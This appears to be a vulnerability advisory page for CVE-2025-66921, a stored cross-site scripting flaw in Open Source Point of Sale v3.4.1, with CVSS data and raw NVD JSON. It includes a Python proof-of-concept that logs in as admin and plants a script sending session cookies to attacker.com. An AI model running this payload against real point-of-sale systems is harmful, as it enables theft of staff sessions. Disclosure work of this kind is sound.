Security Vulnerability Report
中文
CVE-2025-66921 CVSS 7.2 HIGH

CVE-2025-66921

Published: 2025-12-17 17:15:51
Last Modified: 2025-12-18 19:52:17
Source: [email protected]

Description

A Cross-site scripting (XSS) vulnerability in Create/Update Item(s) Module in Open Source Point of Sale v3.4.1 allows remote attackers to inject arbitrary web script or HTML via the "name" parameter.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:opensourcepos:open_source_point_of_sale:3.4.1:*:*:*:*:*:*:* - VULNERABLE
Open Source Point of Sale v3.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-66921 PoC - Stored XSS in Open Source Point of Sale # Target: Open Source Point of Sale v3.4.1 # Module: Create/Update Item Module # Parameter: name TARGET_URL = "http://target.com/opensourcepos" LOGIN_URL = f"{TARGET_URL}/index.php/login" ITEM_URL = f"{TARGET_URL}/index.php/items/save" # Malicious XSS payload XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' def exploit(): """ Exploit for CVE-2025-66921 This PoC demonstrates how to inject XSS via the 'name' parameter """ session = requests.Session() # Step 1: Login with high privilege account (admin/manager) login_data = { 'username': 'admin', 'password': 'password' } session.post(LOGIN_URL, data=login_data) # Step 2: Create item with XSS payload in name parameter item_data = { 'name': XSS_PAYLOAD, 'category_id': '1', 'cost_price': '10.00', 'unit_price': '20.00', 'tax_percent': '0', 'quantity': '100' } response = session.post(ITEM_URL, data=item_data) if response.status_code == 200: print('[+] XSS payload injected successfully!') print('[+] Payload will execute when item is viewed by any user') return True else: print('[-] Exploitation failed') return False if __name__ == '__main__': exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66921", "sourceIdentifier": "[email protected]", "published": "2025-12-17T17:15:50.827", "lastModified": "2025-12-18T19:52:17.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-site scripting (XSS) vulnerability in Create/Update Item(s) Module in Open Source Point of Sale v3.4.1 allows remote attackers to inject arbitrary web script or HTML via the \"name\" parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensourcepos:open_source_point_of_sale:3.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "8EC6C4DB-C7B4-46A5-9479-851918C55014"}]}]}], "references": [{"url": "https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66921/readme.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/opensourcepos/opensourcepos", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66921/readme.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.